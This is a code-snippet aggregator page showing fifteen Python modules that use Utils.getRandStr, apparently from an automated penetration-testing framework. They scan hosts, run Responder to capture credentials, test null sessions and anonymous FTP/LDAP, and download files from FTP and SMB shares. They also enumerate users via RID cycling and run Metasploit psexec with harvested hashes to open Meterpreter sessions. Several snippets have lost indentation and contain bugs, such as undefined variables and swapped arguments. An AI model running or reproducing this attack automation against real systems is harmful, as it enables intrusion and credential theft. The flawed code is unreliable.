本文整理汇总了Python中core.utils.Utils.getRandStr方法的典型用法代码示例。如果您正苦于以下问题:Python Utils.getRandStr方法的具体用法?Python Utils.getRandStr怎么用?Python Utils.getRandStr使用的例子?那么恭喜您, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在类core.utils.Utils的用法示例。
在下文中一共展示了Utils.getRandStr方法的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: processTarget
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
def processTarget(self, t, port):
if not self.seentarget(t + str(port)):
self.addseentarget(t + str(port))
self.display.verbose(self.shortName + " - Connecting to " + t)
try:
conn = httplib.HTTPConnection(t, port, timeout=10)
conn.request('OPTIONS', '/')
response = conn.getresponse()
text = ""
allowed = response.getheader('allow')
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(
port) + "_" + Utils.getRandStr(10)
if (allowed):
badoptions = ['PUT', 'DELETE', 'TRACE', 'TRACK']
for badopt in badoptions:
if (allowed.contains(badopt)):
self.fire("httpOption" + badopt)
self.addVuln(t, "httpOption" + badopt,
{"port": str(port), "output": outfile.replace("/", "%2F")})
self.display.error("VULN [httpOption%s] Found on [%s:%i]" % (badopt, host, int(port)))
text = "Allowed HTTP Options for %s : %s\n\nFull Headers:\n%s" % (
t, allowed, self.print_dict(response.getheaders()))
else:
text = "Allowed HTTP Options for %s : OPTIONS VERB NOT ALLOWED\n\nFull Headers:\n%s" % (
t, self.print_dict(response.getheaders()))
Utils.writeFile(text, outfile)
except httplib.BadStatusLine:
pass
# except socket.error as e:
except:
pass示例2: searchTarget
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
def searchTarget(self, target, port, username, password):
success = False
# start packet capture
cap = self.pktCap(filter="tcp and port " + str(port) + " and host " + target, packetcount=10, timeout=10,
srcip="", dstip=target)
try:
if (Utils.port_open(target, 21)):
# attempt to connect to the remote host
with ftputil.FTPHost(target, username, password) as host:
success = True
# get list of files and loop over them
recursive = host.walk("/", topdown=True, onerror=None)
for root, dirs, files in recursive:
for name in files:
for pattern in self.filepatterns:
match_list = fnmatch.filter(files, pattern)
for fname in match_list:
fpath = host.path.join(root, fname)
if host.path.isfile(fpath):
host.download(fpath, self.config["proofsDir"] + ip + fpath.replace("/", "_"))
host.close()
except ftputil.error.PermanentError:
self.display.error("Could not connect to %s on port 21" % (target))
outfile = self.config["proofsDir"] + self.shortName + "_PCAP_Port" + str(
port) + "_" + target + "_" + Utils.getRandStr(10)
Utils.writeFile(self.getPktCap(cap), outfile)
kb.add("host/" + target + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
return success示例3: run
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
def run(self, target="127.0.0.1", ports="1-1024", flags="-sS", vector="", filetag=""):
# get tmp file
proofsDir = ""
if "proofsDir" in self.config.keys():
proofsDir = self.config["proofsDir"]
self.outfile = proofsDir + "NMAP-" + filetag + "-" + Utils.getRandStr(10)
command = "nmap " + flags + " -p " + ports + " -oA " + self.outfile + " " + target
tmp_results = Utils.execWait(command)
self.display.output("Scan file saved to [%s]" % self.outfile)
return self.loadXMLFile(self.outfile + ".xml", "nmapFile")示例4: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
def process(self):
temp_file = self.config["proofsDir"] + self.shortName + "_" + Utils.getRandStr(10)
command = "responder -I eth0 -wrf"
# run for 15 minutes
# result = Utils.execWait(command, temp_file, timeout=900)
result = Utils.execWait(command, temp_file, timeout=60)
# TODO
# check to see if we got any creds
# if not, wait 5 minutes and run again for 15 minutes
# repeat upto 5 4 times
return示例5: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
temp_file = self.config["proofsDir"] + Utils.getRandStr(10)
# run nmap
n = mynmap(self.config, self.diaplay)
scan_results = n.run(target=t, flags="-sS -A", vector=self.vector)['scan']
# loop over scan results and do anything you need
# fire any new triggers that are needed
# self.fire("TEST123")
for host in scan_results.keys():
# loop over each proto and process it
for proto in ['tcp', 'udp']:
if (proto in scan_results[host]):
# loop over each proto and process it
for port in scan_results[host][proto].keys():
# only worry about open ports
if (scan_results[host][proto][port]["state"] == "open"):
# fire event for "newPortXXX"
self.fire("newPort" + str(port))
kb.add('host/' + host + '/' + proto + 'port', port)
# process services and info
s = scan_results[host][proto][port]
# print "%s - %i/%s (%s) \"%s %s\" [%s]" % (host, port, proto, s['name'],
# s['product'], s['version'], s['extrainfo'])
if (s['name'] == 'http') or (s['name'] == 'https'):
self.fire('web')
# check for any scripts and loop over them
if ('script' in scan_results[host][proto][port].keys()):
for script in scan_results[host][proto][port]['script'].keys():
a = 1
# print " %s - [[%s]]" % (script, scan_results[host][proto][port][
# 'script'][script])
return示例6: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
self.display.verbose(self.shortName + " - Connecting to " + t)
# get windows domain/workgroup
temp_file2 = self.config["proofsDir"] + "nmblookup_" + t + "_" + Utils.getRandStr(10)
command2 = self.config["nmblookup"] + " -A " + t
result2 = Utils.execWait(command2, temp_file2)
workgroup = "WORKGROUP"
for line in result2.split('\n'):
m = re.match(r'\s+(.*)\s+<00> - <GROUP>.*', line)
if (m):
workgroup = m.group(1).strip()
self.display.debug("found ip [%s] is on the workgroup/domain [%s]" % (t, workgroup))
# make outfile
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
# run rpcclient
command = self.config["rpcclient"] + " -N -U \"\" -W " + workgroup + " " + t + " -c srvinfo"
result = Utils.execWait(command, outfile)
# check to see if it worked
if any(x in result for x in ["NT_STATUS_LOGON_FAILURE", "NT_STATUS_ACCESS_DENIED"]):
# do nothing
self.display.verbose("Could not get NULL Session on %s" % t)
else:
# fire a new trigger
self.fire("nullSession")
self.addVuln(t, "nullSession", {"type": "rpc", "output": outfile.replace("/", "%2F")})
self.display.error("VULN [NULLSession] Found on [%s]" % t)
# TODO - process rpcclient srvinfo results
# parse out put and store any new info and fire any additional triggers
return示例7: processTarget
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
def processTarget(self, t, port):
if not self.seentarget(t + str(port)):
self.addseentarget(t + str(port))
self.display.verbose(self.shortName + " - Connecting to " + t)
try:
conn = httplib.HTTPConnection(t, port, timeout=10)
conn.request('GET', '/')
response = conn.getresponse()
serverver = response.getheader('server')
if (serverver):
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(
port) + "_" + Utils.getRandStr(10)
Utils.writeFile("Identified Server Version of %s : %s\n\nFull Headers:\n%s" % (
t, serverver, self.print_dict(response.getheaders())), outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
except httplib.BadStatusLine:
pass
# except socket.error as e:
except:
pass示例8: testTarget
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
def testTarget(self, host, port):
# verify we have not tested this host before
if not self.seentarget(host + str(port)):
self.addseentarget(host + str(port))
self.display.verbose(self.shortName + " - Connecting to " + host)
# start packet capture
cap = self.pktCap(filter="tcp and port " + str(port) + " and host " + host, packetcount=10, timeout=10,
srcip=self.config['lhost'], dstip=host)
# connect to the target host
ftp = FTP()
try:
ftp.connect(host, int(port))
outfile = self.config["proofsDir"] + self.shortName + "_PCAP_Port" + str(
port) + "_" + host + "_" + Utils.getRandStr(10)
try:
# attempt to login as anonymous
result = ftp.login("anonymous", "[email protected]")
if ("Login successful" in result):
# fire a new trigger
self.fire("anonymousFtp")
self.addVuln(host, "anonymousFTP", {"port": str(port), "output": outfile.replace("/", "%2F")})
self.display.error("VULN [AnonymousFTP] Found on [%s]" % host)
else:
self.display.verbose("Could not login as anonymous to FTP at " + host)
except error_perm as e:
self.display.verbose("Could not login as anonymous to FTP at " + host)
# close the connection
ftp.close()
# retrieve pcap results
Utils.writeFile(self.getPktCap(cap), outfile)
except EOFError as e:
self.display.verbose("Could not find FTP server located at " + host + " Port " + str(port))
except socket.error as e:
self.display.verbose("Could not find FTP server located at " + host + " Port " + str(port))示例9: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
ports = kb.get(['service/https/host/' + t + '/tcpport', 'service/ssl/host/' + t + '/tcpport'])
for port in ports:
# verify we have not tested this host before
if not self.seentarget(t + str(port)):
# add the new IP to the already seen list
self.addseentarget(t + str(port))
# make outfile
temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(
port) + "_" + Utils.getRandStr(10)
command = "java -jar " + self.config["miscDir"] + "TestSSLServer.jar " + t + " " + port
result = Utils.execWait(command, temp_file, timeout=30)
# TODO - parse output and store results?
# print result
return示例10: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
ports = kb.get('service/https/' + t + '/tcp', 'service/ssl/' + t + '/tcp')
for port in ports:
# verify we have not tested this host before
if not self.seentarget(t + str(port)):
# add the new IP to the already seen list
self.addseentarget(t + str(port))
# make outfile
temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(
port) + "_" + Utils.getRandStr(10)
command = self.config["java"] + " -jar " + self.config["miscDir"] + "TestSSLServer.jar " + t + " " + port
result = Utils.execWait(command, temp_file, timeout=30)
depricatedlist = []
weakciphers = []
keystrength = ""
tls12 = False
with open (temp_file, "r") as myfile:
result=myfile.readlines()
for line in result:
if (tls12):
m = re.match(r'^ (.*)', line)
if (m):
cipher = line.strip()
if "DES" in cipher:
if cipher not in weakciphers:
weakciphers.append(cipher)
elif "RSA" in cipher:
if cipher not in weakciphers:
weakciphers.append(cipher)
elif "NULL" in cipher:
if cipher not in weakciphers:
weakciphers.append(cipher)
else:
tls12 = False
else:
m = re.match(r'^\s*Supported versions: (.*)', line)
if (m):
if ("SSLv2" in m.group(1)):
protocol = "SSLv2"
if protocol not in depricatedlist:
depricatedlist.append(protocol)
elif ("SSLv3" in m.group(1)):
protocol = "SSLv3"
if protocol not in depricatedlist:
depricatedlist.append(protocol)
elif ("TLSv1.0" in m.group(1)):
protocol = "TLSv1.0"
if protocol not in depricatedlist:
depricatedlist.append(protocol)
elif ("TLSv1.1" in m.group(1)):
protocol = "TLSv1.1"
if protocol not in depricatedlist:
depricatedlist.append(protocol)
m = re.match(r'^ TLSv1.2\s*', line)
if (m):
tls12 = True
# store data into KB
for depricatedProto in depricatedlist:
kb.add('service/https/' + t + '/tcp/' + port + '/depricatedSSLProto/' + depricatedProto)
for weakCipher in weakciphers:
kb.add('service/https/' + t + '/tcp/' + port + '/weakSSLCipher/' + weakCipher)
if keystrength is not "":
kb.add('service/https/' + t + '/tcp/' + port + '/weakSSLKeyStrength/' + keystrength)
return示例11: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
callFire = False
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
self.display.verbose(self.shortName + " - Connecting to " + t)
# add the new IP to the already seen list
self.addseentarget(t)
# make outfile
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
# run rpcclient
command = "ldapsearch -h " + t + " -p 389 -x -s base"
result = Utils.execWait(command, outfile)
# TODO - Parse output and do stuff
parts = re.findall("ref: .*", result)
for part in parts:
callFire = True
self.addVuln(t, "AnonymousLDAP", {"port": "389", "message": str(part).replace("/", "%2F"), "output": outfile.replace("/", "%2F")})
if callFire:
self.fire("anonymousLDAP")
return示例12: searchDir
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
def searchDir(self, host, conn, share, path, depth=0):
if depth > 5:
return
try:
# list the files on each share (recursivity?)
names = conn.listPath(share, path, timeout=30)
for name in names:
if name.isDirectory:
if name.filename not in [u'.', u'..']:
self.searchDir(conn, host, share, path + name.filename + '/', depth + 1)
else:
for pattern in self.filepatterns:
try:
re.compile(pattern)
result = re.match(pattern, name.filename)
if (result):
#download the file
outfile = self.config["proofsDir"] + self.shortName + "_" + host + "_" + share + "_" + name.filename.replace("/", "-") + "_" + Utils.getRandStr(10)
temp_fh = StringIO()
conn.retrieveFile(share, path + name.filename, temp_fh)
temp_fh.seek(0)
Utils.writeFile(temp_fh.getvalue(), outfile)
self.display.debug("_____ Share[" + share + "] =" + path + name.filename)
except re.error:
pass
#self.display.debug("Invalid File Pattern --> %s <--" % pattern)
except:
self.display.debug('### can not access the resource')
return示例13: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
self.display.verbose(self.shortName + " - Connecting to " + t)
msf.execute("use auxiliary/scanner/smb/smb_enumusers\n")
msf.execute("set RHOSTS %s\n" % t)
msf.execute("run\n")
# msf.sleep(int(self.config['msfexploitdelay']))
result = msf.getResult()
while (re.search(".*execution completed.*", result) is None):
result = result + msf.getResult()
# TODO - process results and store user list to KB
# need to do something better with this.
# loop over each user and store in the KB
# if local, store in "/host/" + t + "/user/" + user
# if domain, store in "/domain/" + domainname + "/user/" + user
# for now, just print out the results
# MSF output format:[*] [timestamp] IP DOMAIN [user,users] ( extras)
parts = re.findall(".*" + t.replace(".", "\.") + ".*", result)
for part in parts:
if "RHOSTS" in part:
pass
else:
try:
pieces = part.split()
domain = pieces[3]
kb.add("domain/" + domain.strip() + "/host/" + t)
extras = part.split('(')[1].split(')')[0]
users = part.split('[')[3].split(']')[0].split(',')
for user in users:
kb.add("host/" + t + "/user/" + user.strip())
except:
pass
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
Utils.writeFile(result, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
# clean up after ourselves
result = msf.cleanup()
return示例14: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
self.display.verbose(self.shortName + " - Connecting to " + t)
# get windows domain/workgroup
temp_file2 = self.config["proofsDir"] + "nmblookup_" + t + "_" + Utils.getRandStr(10)
command2 = "nmblookup -A " + t
result2 = Utils.execWait(command2, temp_file2)
workgroup = "WORKGROUP"
for line in result2.split('\n'):
m = re.match(r'\s+(.*)\s+<00> - <GROUP>.*', line)
if (m):
workgroup = m.group(1).strip()
self.display.debug("found ip [%s] is on the workgroup/domain [%s]" % (t, workgroup))
# add the current host to the domain in the KB
kb.add('domain/' + workgroup + '/host/' + t)
# make outfile
temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
# run rpcclient
command = "rpcclient -N -U \"\" " + t + " -c enumdomusers"
result = Utils.execWait(command, temp_file)
# check to see if it worked
if any(x in result for x in ["NT_STATUS_LOGON_FAILURE", "NT_STATUS_ACCESS_DENIED"]):
rid_start = 500
rid_stop = 10000
sid = False
# pull the domain via lsaenum
result2 = Utils.execWait('rpcclient -U "" %s -N -c "lsaquery"' % t, None)
# if the user wasn't found, return a False
if "Domain Sid" in result2:
sid = result2
if sid:
sid = sid.replace("WARNING: Ignoring invalid value 'share' for parameter 'security'", "")
# format it properly
sid = sid.rstrip()
sid = sid.split(" ")
sid = sid[4]
# cycle through rid and enumerate the domain
sid_names = self.sids2names(t, sid, rid_start, rid_stop)
if sid_names:
for name in sid_names:
# fire a new trigger
self.fire("newUser")
m = re.match(r'(.*)\\(.*)', name)
if (m):
self.display.debug("IP [%s] has local user [%s]" % (t, m.group(2)))
kb.add('host/' + t + '/user/' + m.group(2))
if (workgroup != "WORKGROUP"):
self.display.debug("Domain [%s] has user [%s]" % (workgroup, m.group(2)))
kb.add('domain/' + workgroup + '/user/' + m.group(2))
else:
# loop over each returned user and add it to the KB
for line in result.split('\n'):
m = re.match(r'user:\[(.*)\] rid:\[(.*)\].*', line)
if (m):
# fire a new trigger
self.fire("newUser")
self.display.debug("IP [%s] has local user [%s]" % (t, m.group(1)))
kb.add('host/' + t + '/user/' + m.group(1))
if (workgroup != "WORKGROUP"):
self.display.debug("Domain [%s] has user [%s]" % (workgroup, m.group(1)))
kb.add('domain/' + workgroup + '/user/' + m.group(1))
return示例15: process
# 需要导入模块: from core.utils import Utils [as 别名]
# 或者: from core.utils.Utils import getRandStr [as 别名]
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# loop over each target
for t in self.targets:
users = kb.get("host/" + t + "/user")
for user in users:
hashes = kb.get ("host/" + t + "/user/" + user + "/fullhash")
for passhash in hashes:
# verify we have not tested this host before
if not self.seentarget(t+user+passhash):
# add the new IP to the already seen list
self.addseentarget(t+user+passhash)
self.display.verbose(self.shortName + " - Connecting to " + t)
msf.execute("use exploit/windows/smb/psexec\n")
# msf.execute("set PAYLOAD windows/meterpreter/bind_tcp\n")
# msf.execute("set LHOST %s\n" % self.config['lhost'])
# msf.execute("set LPORT %i\n" % int(Utils.getUnusedPort()))
# msf.execute("set LPORT 4444\n")
msf.execute("set RPORT 445\n")
msf.execute("set RHOST " + t + "\n")
msf.execute("set SMBUser " + user + "\n")
msf.execute("set SMBPass " + passhash + "\n")
msf.execute("exploit -j\n")
msf.sleep(int(self.config['msfexploitdelay']))
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
result = msf.getResult()
Utils.writeFile(result, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
parts = re.findall(".*Meterpreter session (\d+) opened.*", result)
for part in parts:
self.fire("msfSession")
self.display.verbose("NEW session on : " + t)
kb.add("host/" + t + "/msfSession/" + str(part))
# clean up after ourselves
result = msf.cleanup()
return